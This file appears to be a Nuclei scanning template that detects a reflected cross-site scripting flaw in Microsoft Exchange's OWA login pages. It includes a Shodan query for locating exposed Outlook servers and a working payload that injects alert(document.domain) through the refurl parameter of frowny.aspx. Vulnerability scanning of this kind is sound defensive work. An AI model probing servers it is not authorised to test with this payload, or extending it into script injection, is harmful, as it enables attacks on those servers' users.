34 lines
812 B
YAML
34 lines
812 B
YAML
id: ms-exchange-server-reflected-xss
|
|
|
|
info:
|
|
name: MS Exchange Server Cross-Site Scripting
|
|
author: infosecsanyam
|
|
severity: medium
|
|
reference:
|
|
- https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html
|
|
metadata:
|
|
shodan-query: http.title:"Outlook"
|
|
tags: microsoft,exchange,owa,xss
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- 'alert(document.domain)//&et=ServerError'
|
|
- 'mail/bootr.ashx'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 500
|
|
|
|
- type: word
|
|
words:
|
|
- "text/html"
|
|
part: header
|